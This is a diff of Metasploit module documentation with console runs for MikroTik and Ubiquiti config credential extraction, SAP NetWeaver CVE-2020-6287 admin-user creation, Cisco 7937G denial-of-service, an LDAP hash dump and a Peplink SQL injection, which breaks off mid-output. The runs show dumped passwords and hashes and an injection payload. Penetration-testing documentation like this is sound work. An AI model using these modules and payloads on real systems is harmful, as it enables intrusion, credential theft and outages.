+resource (mikrotik_config.rb)> use auxiliary/admin/networking/mikrotik_config
+resource (mikrotik_config.rb)> set rhost 1.1.1.1
+rhost => 1.1.1.1
+resource (mikrotik_config.rb)> set config /tmp/mikrotik.config
+config => /tmp/mikrotik.config
+resource (mikrotik_config.rb)> set verbose true
+verbose => true
+resource (mikrotik_config.rb)> run
+[*] Running module against 1.1.1.1
+[*] Importing config
+[+] 1.1.1.1:22 OS: RouterOS 6.45.9
+[+] 1.1.1.1:22 Wireless AP wpawifi with WPA password presharedkey
+[+] 1.1.1.1:22 Wireless AP wpa2wifi with WPA2 password presharedkey
+[+] 1.1.1.1:22 Wireless AP wpaeapwifi with WPA2-EAP username username password password
+[+] 1.1.1.1:22 Wireless AP wepwifi with WEP password 0123456789 with WEP password 0987654321 with WEP password 1234509876 with WEP password 0192837645
+[+] 1.1.1.1:22 Wireless AP wep1wifi with WEP password 1111111111
+[+] 1.1.1.1:22 disabled Open VPN Client to 10.99.99.98 on mac FE:45:B0:31:4A:34 named ovpn-out1 with username user and password password
+[+] 1.1.1.1:22 disabled Open VPN Client to 10.99.99.98 on mac FE:45:B0:31:4A:34 named ovpn-out2 with username user and password password
+[+] 1.1.1.1:22 disabled Open VPN Client to 10.99.99.98 on mac FE:45:B0:31:4A:34 named ovpn-out3 with username user and password password
+[+] 1.1.1.1:22 disabled Open VPN Client to 10.99.99.98 on mac FE:45:B0:31:4A:34 named ovpn-out4 with username user and password password
+[+] 1.1.1.1:22  PPPoE Client on ether2 named pppoe-user and service name internet with username user and password password
+[+] 1.1.1.1:22  L2TP Client to 10.99.99.99 named l2tp-hm with username l2tp-hm and password 123
+[+] 1.1.1.1:22  PPTP Client to 10.99.99.99 named pptp-hm with username pptp-hm and password 123
+[+] 1.1.1.1:22 SNMP community write with password write and write access
+[+] 1.1.1.1:22 SNMP community v3 with password 0123456789(SHA1), encryption password 9876543210(AES) and write access
+[+] 1.1.1.1:22  SMB Username mtuser and password mtpasswd
+[+] 1.1.1.1:22 disabled SMB Username disableduser and password disabledpasswd with RO only access
+[+] 1.1.1.1:22 disabled PPP tunnel bridging named ppp1 with profile name ppp_bridge and password password
+[+] 1.1.1.1:22 SMTP Username smtpuser and password smtppassword for 1.1.1.1:25
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+
+### SwOS 2.12 from Mikrotik CSS326-24G-2S+RM
+
+```
+resource (mikrotik_config_sw.rb)> use auxiliary/admin/networking/mikrotik_config
+resource (mikrotik_config_sw.rb)> set rhost 1.1.1.1
+rhost => 1.1.1.1
+resource (mikrotik_config_sw.rb)> set config /home/h00die/Downloads/backup(1).swb
+config => /home/h00die/Downloads/backup(1).swb
+resource (mikrotik_config_sw.rb)> set verbose true
+verbose => true
+resource (mikrotik_config_sw.rb)> set action SWOS
+action => SWOS
+resource (mikrotik_config_sw.rb)> run
+[*] Running module against 1.1.1.1
+[*] Importing config
+[*] 1.1.1.1:22 IP Address: 192.168.88.1
+[+] 1.1.1.1:22 Hostname: MikroTik-css326
+[+] 1.1.1.1:22 Admin login password: admin
+[+] 1.1.1.1:22 SNMP Community: public, contact: , location: 
+[*] 1.1.1.1:22 Port 24 Named: uplink
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
@@ -1,43 +1,45 @@
-## General Notes
+## Vulnerable Application

-  This module imports an Ubiquiti Unifi configuration file into the database.
-  This is similar to `post/multi/gather/ubiquiti_unifi_backup` only access isn't required,
-  and assumes you already have the file.
+### General Notes

-  This module is able to take a unf file, from the controller and perform the following actions:
+This module imports an Ubiquiti Unifi configuration file into the database.
+This is similar to `post/multi/gather/ubiquiti_unifi_backup` only access isn't required,
+and assumes you already have the file.

-  1. Decrypt the file
-  2. Fix the zip file if a `zip` utility is on the system
-  3. Extract db.gz
-  4. Unzip the db file
-  5. Import the db file
+This module is able to take a unf file, from the controller and perform the following actions:

-  Or simply pass the db file for import directly.
+1. Decrypt the file
+2. Fix the zip file if a `zip` utility is on the system
+3. Extract db.gz
+4. Unzip the db file
+5. Import the db file
+
+Or simply pass the db file for import directly.

 ## Verification Steps

 1. Have a Ubiquiti Unifi configuration file (db or unf)
 2. Start `msfconsole`
-3. `use auxiliary/admin/ubiquiti/ubiquiti_config`
+3. `use auxiliary/admin/networking/ubiquiti_config`
 4. `set RHOST x.x.x.x`
 5. `set CONFIG /tmp/file.unf`
 6. `run`

 ## Options

-  **RHOST**
+### RHOST

-  Needed for setting services and items to.  This is relatively arbitrary.
+Needed for setting services and items to.  This is relatively arbitrary.

-  **CONFIG**
+### CONFIG

-  File path to the configuration unf or db file..
+File path to the configuration unf or db file..

 ## Scenarios

 ### Unf File
 ```
-resource (unifi_config.rb)> use auxiliary/admin/ubiquiti/ubiquiti_config
+resource (unifi_config.rb)> use auxiliary/admin/networking/ubiquiti_config
 resource (unifi_config.rb)> set rhosts 127.0.0.1
 rhosts => 127.0.0.1
 resource (unifi_config.rb)> set config /root/.msf4/loot/20190825172544_default_1.1.1.1_ubiquiti.unifi.b_740136.unf
@@ -59,12 +61,12 @@ resource (unifi_config.rb)> run
 ### db File

 ```
-resource (unifi_config.rb)> use auxiliary/admin/ubiquiti/ubiquiti_config
+resource (unifi_config.rb)> use auxiliary/admin/networking/ubiquiti_config
 resource (unifi_config.rb)> set rhosts 127.0.0.1
 rhosts => 127.0.0.1
-msf5 auxiliary(admin/ubiquiti/ubiquiti_config) > set config /root/.msf4/loot/db
+msf5 auxiliary(admin/networking/ubiquiti_config) > set config /root/.msf4/loot/db
 config => /root/.msf4/loot/db
-msf5 auxiliary(admin/ubiquiti/ubiquiti_config) > run
+msf5 auxiliary(admin/networking/ubiquiti_config) > run
 [*] Running module against 127.0.0.1

 [*] Converting config BSON to JSON
@@ -0,0 +1,91 @@
+## Vulnerable Application
+
+This module leverages an unauthenticated web service to submit a job which will create a user with a specified role. The
+job involves running a wizard. After the necessary action is taken, the job is canceled to avoid unnecessary system
+changes.
+
+SAP NetWeaver NetWeaver versions 7.30 through 7.50 are affected by this vulnerability. An Amazon Machine Image (AMI) for
+Amazon Web Services (AWS) can be used as a testing environment. One such image is provided by Linke IT America LLC and
+is available on the [AWS Marketplace][1] with installation instructions posted to their [blog][2].
+
+Once set up and configured, the instances will be vulnerable on the default HTTP port 50000.
+
+If the password does not meet the requirements (e.g. the value is too short), the server will respond with an error
+message and the Metasploit module will need to be rerun.
+
+## Verification Steps
+
+  1. Install the application
+  1. Start msfconsole
+  1. Do: `use auxiliary/admin/sap/cve_2020_6287_ws_add_user`
+  1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
+  1. Run the module and wait a few seconds
+  1. Once the "PCK Upgrade" job has been canceled, log in with the created credentials
+
+## Options
+
+### ROLE
+
+The role to assign to the user in the system. This value is "Administrator" by default. If the role does not exist, then
+execution will fail. For more information on users and roles, see the [SAP documentation][3].
+
+From the documentation:
+> Standard UME roles include such actions. The UME role Administrator includes Manage_ All, which enables you to display
+> and change everything. By default, administrator roles are only assigned to administrators.
+
+## Scenarios
+
+### SAP NetWeaver 7.50
+
+Example: Adding a new user `metasploit` with the `Administrator` role:
+
+```
+msf5 > use auxiliary/admin/sap/cve_2020_6287_ws_add_user 
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set RHOSTS netweaver.lan
+RHOSTS => netweaver.lan
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set USERNAME metasploit
+USERNAME => metasploit
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set PASSWORD 0pe3nS3sam3
+PASSWORD => 0pe3nS3sam3
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > check
+[+] 192.168.53.183:50000 - The target is vulnerable.
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set VERBOSE true
+VERBOSE => true
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > run
+[*] Running module against 192.168.53.183
+
+[*] Starting the PCK Upgrade job...
+[+] Job running with session id: 3e76e705-4bbd-4a6b-b243-154768287fb0
+[*] Received event description: Execution of User Management
+[*] Received event description: Create User PCKUser
+[+] Successfully created the user account
+[*] Received event description: Assign Role SAP_XI_PCK_CONFIG to PCKUser
+[+] Successfully added the role to the new user
+[*] Canceling the PCK Upgrade job...
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) >
+```
+
+Example: Removing the user `metasploit`:
+
+```
+msf5 > use auxiliary/admin/sap/cve_2020_6287_ws_add_user 
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set RHOSTS netweaver.lan
+RHOSTS => netweaver.lan
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set USERNAME metasploit
+USERNAME => metasploit
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set PASSWORD 0pe3nS3sam3
+PASSWORD => 0pe3nS3sam3
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set ACTION REMOVE
+ACTION => REMOVE
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > run
+[*] Running module against 192.168.53.183
+
+[+] Successfully deleted the user account
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) >
+```
+
+[1]: https://aws.amazon.com/marketplace/seller-profile?id=56cbce49-5486-4a83-a6b7-0fea3841da1b
+[2]: https://docs.linkeit.com/amis/catalog/sap_ready_ami_installation_guide_nw750java_susesyb/
+[3]: https://help.sap.com/doc/saphelp_nw73ehp1/7.31.19/en-US/4a/6e8a7ab94e4d27e10000000a42189b/frameset.htm
@@ -0,0 +1,43 @@
+The `auxiliary/client/telegram/send_message` module allows you to send a Telegram message to given chat ID with a given
+Telegram bot token. This module also can be used as a notifier for established sessions with using the `AutoRunScript` handler option.
+
+## Module Options
+
+**BOT TOKEN**
+
+Each Telegram bot is given a unique authentication token when it is created. The token looks like
+`123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11`. You can generate a new token by messaging @botfather via `https://t.me/botfather` and
+sending the message `/newbot` to it, which should prompt it to ask a series of questions that will allow you to generate your bot.
+Once you have completed this, you should get a message saying `Use this token to access the HTTP API:` followed by the value of the
+bot's token. Use this value for `BOT_TOKEN`. If you have any issues, refer to [this document](https://core.telegram.org/bots#6-botfather).
+
+**CHAT ID**
+
+Unique identifier for a chat. To get the `CHAT_ID` value, send a message to the bot username that you created
+earlier. Then browse to `https://api.telegram.org/bot<BOT_TOKEN VALUE>/getUpdates`
+and look for a line like `"chat":"id":1344308063`. That ID is what you will
+want to use the value of `CHAT_ID`; in this case it would be `1344308063`.
+
+**MSG**
+
+The message content.
+
+**FORMATTING**
+
+The Bot API supports basic formatting for messages. You can use bold, italic, underlined and strikethrough text,
+as well as inline links and pre-formatted code in your bots' messages. Telegram clients will render them accordingly.
+You can use either markdown-style or HTML-style formatting.
+
+## Demonstration
+
+```
+msf5 > use auxiliary/client/telegram/send_message
+msf5 post(client/telegram/send_message) > set BOT_TOKEN 851676320:AAFAkVtZP5Hd8cmfFIUg6j4eWJndDtdksl4
+BOT_TOKEN => 851676320:AAFAkVtZP5Hd8cmfFIUg6j4eWJndDtdksl4
+msf5 post(client/telegram/send_message) > set CHAT_ID 123456789
+CHAT_ID => 123456789
+msf5 auxiliary(client/telegram/send_message) > run
+
+[+] Message sent
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,104 @@
+## Vulnerable Application
+
+  [Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station.
+  This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.
+
+### Description
+
+  This module exploits a bug in how the conference station handles incoming SSH
+  connections that provide an incompatible key exchange. By connecting with an
+  incompatible key exchange, the device becomes nonresponsive until it is manually power cycled.
+
+## Verification Steps
+
+  1. Obtain a Cisco 7937G Conference Station.
+  2. Enable SSH Access on the device.
+  3. Start msfconsole
+  4. Do: `use auxiliary/dos/cisco/cisco_7937G_dos`
+  5. Do: `set RHOST 192.168.1.10`
+  6. Do: `run`
+  7. The conference station should now be nonresponsive until it is power cycled
+
+## Options
+
+  No options
+
+## Scenarios
+
+### Cisco 7937G Running Firmware Version SCCP-1-4-5-7
+
+#### Successful Scenario:
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937G_dos 
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run
+
+[*] Starting server...
+[*] 192.168.110.209 - Connected (version 2.0, client OpenSSH_4.3)
+[-] 192.168.110.209 - Exception: Incompatible ssh peer (no acceptable kex algorithm)
+[-] 192.168.110.209 - Traceback (most recent call last):
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2083, in run
+[-] 192.168.110.209 -     self._handler_table[ptype](self, m)
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2198, in _negotiate_keys
+[-] 192.168.110.209 -     self._parse_kex_init(m)
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2354, in _parse_kex_init
+[-] 192.168.110.209 -     raise SSHException(
+[-] 192.168.110.209 - paramiko.ssh_exception.SSHException: Incompatible ssh peer (no acceptable kex algorithm)
+[-] 192.168.110.209 - 
+[*] 192.168.110.209 - dos non-reset attack completed!
+[*] 192.168.110.209 - Errors are intended.
+[*] 192.168.110.209 - Device must be power cycled to restore functionality.
+[*] Auxiliary module execution completed
+```
+
+#### Unsuccessful Scenario:
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937G_dos 
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run
+
+[*] Starting server...
+[-] 192.168.110.209 - Device doesn't appear to be functioning (already dos'd?) or SSH is not enabled.
+[*] Auxiliary module execution completed
+```
+
+### Cisco 7937G Running Firmware Version SCCP-1-4-5-5
+
+#### Successful Scenario:
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937G_dos 
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run
+
+[*] Starting server...
+[*] 192.168.110.209 - Connected (version 2.0, client OpenSSH_4.3)
+[-] 192.168.110.209 - Exception: Incompatible ssh peer (no acceptable kex algorithm)
+[-] 192.168.110.209 - Traceback (most recent call last):
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2083, in run
+[-] 192.168.110.209 -     self._handler_table[ptype](self, m)
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2198, in _negotiate_keys
+[-] 192.168.110.209 -     self._parse_kex_init(m)
+[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2354, in _parse_kex_init
+[-] 192.168.110.209 -     raise SSHException(
+[-] 192.168.110.209 - paramiko.ssh_exception.SSHException: Incompatible ssh peer (no acceptable kex algorithm)
+[-] 192.168.110.209 - 
+[*] 192.168.110.209 - dos non-reset attack completed!
+[*] 192.168.110.209 - Errors are intended.
+[*] 192.168.110.209 - Device must be power cycled to restore functionality.
+[*] Auxiliary module execution completed
+```
+
+#### Unsuccessful Scenario:
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937G_dos 
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run
+
+[*] Starting server...
+[-] 192.168.110.209 - Device doesn't appear to be functioning (already dos'd?) or SSH is not enabled.
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,54 @@
+## Vulnerable Application
+
+  [Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station.
+  This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.
+
+### Description
+
+  This module exploits a bug in how the conference station handles executing a ping via its web interface.
+  By repeatedly executing the ping function without clearing out the resulting output,
+  a DoS is caused that will reset the device after a few minutes.
+
+## Verification Steps
+
+  1. Obtain a Cisco 7937G Conference Station.
+  2. Enable Web Access on the device (default configuration).
+  3. Start msfconsole
+  4. Do: `use auxiliary/dos/cisco/cisco_7937g_dos_reboot`
+  5. Do: `set rhost 192.168.1.10`
+  6. Do: `run`
+  7. The conference station should become nonresponsive and then power cycle itself.
+
+## Options
+
+  No options
+
+## Scenarios
+
+### Cisco 7937G Running Firmware Version SCCP-1-4-5-7
+
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937g_dos_reboot
+msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run
+
+[*] Starting server...
+[*] 192.168.110.209 - Sending DoS Packets. Stand by.
+[*] 192.168.110.209 - DoS reset attack completed!
+[*] Auxiliary module execution completed
+```
+
+### Cisco 7937G Running Firmware Version SCCP-1-4-5-5
+
+```
+msf5 > use auxiliary/dos/cisco/cisco_7937g_dos_reboot
+msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209
+rhost => 192.168.110.209
+msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run
+
+[*] Starting server...
+[*] 192.168.110.209 - Sending DoS Packets. Stand by.
+[*] 192.168.110.209 - DoS reset attack completed!
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,199 @@
+## Vulnerable Application
+
+### Description
+
+This module uses an LDAP connection to dump data from LDAP server
+using an anonymous or authenticated bind.
+Searching for specific attributes it collects user credentials.
+
+### Setup
+
+Tested in the wild.
+
+You may eventually setup an intentionally insecure OpenLDAP server in docker.
+The below OpenLDAP server does not have any ACL, therefore the hashPassword
+attributes are readable by anonymous clients.
+
+```
+$ git clone https://github.com/HynekPetrak/bitnami-docker-openldap.git
+$ cd bitnami-docker-openldap
+$ docker-compose up -d
+Creating bitnami-docker-openldap_openldap_1 ... done
+
+msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf5 auxiliary(gather/ldap_hashdump) > set RPORT 1389
+RPORT => 1389
+msf5 auxiliary(gather/ldap_hashdump) > options
+
+Module options (auxiliary/gather/ldap_hashdump):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   BASE_DN                     no        LDAP base DN if you already have it
+   BIND_DN                     no        The username to authenticate to LDAP server
+   BIND_PW                     no        Password for the BIND_DN
+   PASS_ATTR  userPassword     yes       LDAP attribute, that contains password hashes
+   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      1389             yes       The target port
+   SSL        false            no        Enable SSL on the LDAP connection
+   USER_ATTR  dn               no        LDAP attribute, that contains username
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   Dump  Dump all LDAP data
+
+
+msf5 auxiliary(gather/ldap_hashdump) >
+
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against 127.0.0.1
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=example,dc=org
+[*] Dumping LDAP data from server at 127.0.0.1:1389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200801220435_default_127.0.0.1_LDAPInformation_704646.txt
+[*] Searching for attribute: userPassword
+[*] Taking dn attribute as username
+[+] Credentials found: cn=user01,ou=users,dc=example,dc=org:password1
+[+] Credentials found: cn=user02,ou=users,dc=example,dc=org:password2
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/ldap_hashdump) >
+
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Actions
+
+### Dump
+
+Dump all LDAP data from the LDAP server.
+
+## Options
+
+### BASE_DN
+
+If you already have the LDAP base DN, you may set it in this option.
+
+### USER_ATTR
+
+LDAP attribute to take the user name from. Defaults to DN, however you may
+wish to change it UID, name or similar.
+
+### PASS_ATTR
+
+LDAP attribute to take the password hash from. Defaults to userPassword,
+some LDAP server may use different attribute, e.g. unixUserPassword,
+sambantpassword, sambalmpassword.
+
+## Scenarios
+
+### Avaya Communication Manager via anonymous bind
+
+```
+msf5 > use auxiliary/gather/ldap_hashdump
+msf5 auxiliary(gather/ldap_hashdump) > options
+
+Module options (auxiliary/gather/ldap_hashdump):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   BASE_DN                     no        LDAP base DN if you already have it
+   PASS_ATTR  userPassword     yes       LDAP attribute, that contains password hashes
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      389              yes       The target port
+   SSL        false            no        Enable SSL on the LDAP connection
+   USER_ATTR  dn               no        LDAP attribute, that contains username
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   Dump  Dump all LDAP data
+
+
+msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS [redacted_ip_address]
+RHOSTS => [redacted_ip_address]
+
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against [redacted_ip_address]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=vsp
+[*] Dumping LDAP data from server at [redacted_ip_address]:389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726121633_default_[redacted_ip_address]_LDAPInformation_716210.txt
+[*] Searching for attribute: userPassword
+[*] Taking dn attribute as username
+[+] Credentials found: uid=cust,ou=People,dc=vsp:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[+] Credentials found: uid=admin,ou=People,dc=vsp:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/ldap_hashdump) > set USER_ATTR uid
+USER_ATTR => uid
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against [redacted_ip_address]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=vsp
+[*] Dumping LDAP data from server at [redacted_ip_address]:389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726121718_default_[redacted_ip_address]_LDAPInformation_712562.txt
+[*] Searching for attribute: userPassword
+[*] Taking uid attribute as username
+[+] Credentials found: cust:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[+] Credentials found: admin:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/ldap_hashdump) >
+```
+
+### NASDeluxe - NAS with Samba LM/NTLM hashes
+
+```
+msf5 auxiliary(gather/ldap_hashdump) > set USER_ATTR uid
+USER_ATTR => uid
+msf5 auxiliary(gather/ldap_hashdump) > set PASS_ATTR sambantpassword
+PASS_ATTR => sambantpassword
+msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS [redacted_ip_address]
+RHOSTS => [redacted_ip_address]
+
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against [redacted_ip_address]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=server,dc=nas
+[*] Dumping LDAP data from server at [redacted_ip_address]:389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726201006_default_[redacted_ip_address]_LDAPInformation_026574.txt
+[*] Searching for attribute: sambantpassword
+[*] Taking uid attribute as username
+[+] Credentials found: admin:209C6174DA490CAEB422F3FA5A7AE634
+[+] Credentials found: joe:58E8C758A4E67F34EF9C40944EB5535B
+[*] Auxiliary module execution completed
+
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against [redacted_ip_address]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=server,dc=nas
+[*] Dumping LDAP data from server at [redacted_ip_address]:389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726201731_default_[redacted_ip_address]_LDAPInformation_427417.txt
+[*] Searching for attribute: sambalmpassword
+[*] Taking uid attribute as username
+[+] Credentials found: admin:F0D412BD764FFE81AAD3B435B51404EE
+[+] Credentials found: joe:3417BE166A79DDE2AAD3B435B51404EE
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,430 @@
+## Vulnerable Application
+
+### Introduction
+
+This module exploits an SQLi vulnerability in the web interface of Peplink
+routers running outdated firmware (confirmed on version 7.0.0-build1904 and below).
+
+The vulnerability is due to the lack of sanitization applied to the bauth cookie,
+Successful exploitation of the vulnerability allows unauthenticated attackers to get
+into sessions of legitimate users (bypassing authentication).
+
+Exploitation of this vulnerability requires that there is at least one active user session
+created in the last 4 hours (or session lifetime if it was modified).
+
+## Verification Steps
+
+
+## Options
+
+### BypassLogin
+
+If true, don't retrieve cookies, just use the SQL injection vulnerability to bypass the login
+In the case where expired and non-expired admin sessions exist, might select the expired session if enabled.
+
+### AdminOnly
+
+Only attempt to retrieve cookies of privilegied users (admins)
+
+### EnumPrivs
+
+Retrieve the privilege associated with each session
+
+### EnumUsernames
+
+Retrieve the username associated with each session
+
+### LimitTries
+
+The max number of sessions to try (from most recent), set to avoid checking expired ones needlessly
+
+## Scenarios
+
+Vulnerable firmware downloadable from [here](https://www.peplink.com/support/downloads/archive/).
+It's possible to reproduce the vulnerability without owning a peplink router, using
+[FusionHub](https://www.peplink.com/products/fusionhub/).
+Refer to its installation guide, use a free Solo license.
+
+### Firmware version 6.3.2
+
+BypassLogin:
+
+```
+msf5 auxiliary(gather/peplink_bauth_sqli) > set BypassLogin true
+msf5 auxiliary(gather/peplink_bauth_sqli) > run
+[*] Running module against 192.168.1.254
+
+[+] Target seems to be vulnerable
+[*] Checking for admin cookie : ' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')--
+[+] Retrieved config, saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkconfigur_203870.bin
+[*] Retrieving fhlicense_info
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkfhlicens_829403.txt
+[*] Retrieving sysinfo
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinksysinfo_824042.txt
+[*] Retrieving macinfo
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkmacinfo_992224.txt
+[*] Retrieving hostnameinfo
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkhostname_183370.txt
+[*] Retrieving uptime
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkuptime_523334.txt
+[*] Retrieving client_info
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkclient_i_704361.txt
+[*] Retrieving hubport
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkhubport_264378.txt
+[*] Retrieving fhstroute
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkfhstrout_701714.txt
+[*] Retrieving ipsec
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkipsec_664157.txt
+[*] Retrieving wan_summary
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkwan_summ_936160.txt
+[*] Retrieving firewall
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkfirewall_270172.txt
+[*] Retrieving cert_info
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkcert_inf_201536.txt
+[*] Retrieving mvpn_summary
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkmvpn_sum_261747.txt
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/peplink_bauth_sqli) >
+```
+
+The config is a .tar.gz archive with an added 36-byte header, you can extract the plaintext config:
+```
+$ dd if=20200802_fshhw1_1135E8A0DD29.conf of=config.tar.gz skip=36 bs=1
+$ tar vxf config.tar.gz
+```
+The config usually includes the admin password in cleartext.
+Note: it's also possible to upload a modified config.
+```
+$ cat config
+ADMIN_HTTPS_ENABLE="yes"
+ADMIN_HTTPS_LANONLY="no"
+ADMIN_HTTPS_PORT="443"
+ADMIN_HTTP_ENABLE="yes"
+ADMIN_HTTP_TO_HTTPS="yes"
+ADMIN_LANONLY="no"
+ADMIN_NAME="admin"
+ADMIN_PASSWORD="mySECUREpassword1"
+ADMIN_PORT="80"
+ADMIN_ROA_PASSWORD="user"
+ADMIN_SESSION_TIMEOUT="14400"
+CONFIG_VERSION="6.0"
+DHCP_SERVER="enable"
+FIREWALL_IDS="yes"
+HOSTNAME="peplink"
+IPSEC_NAT="yes"
+LAN_CONN_METHOD="static"
+LAN_IPADDR="192.168.1.254"
+LAN_NETMASK="255.255.255.0"
+LEFTTIME_USAGE="yes"
+...
+```
+
+EnumPrivs and EnumUsernames:
+
+```
+msf5 auxiliary(sqli/peplink_bauth_sqli) > set EnumPrivs true 
+EnumPrivs => true
+msf5 auxiliary(sqli/peplink_bauth_sqli) > set EnumUsernames true 
+EnumUsernames => true
+msf5 auxiliary(sqli/peplink_bauth_sqli) > run 
+[*] Running module against 192.168.1.254
+
+[+] Target seems vulnerable
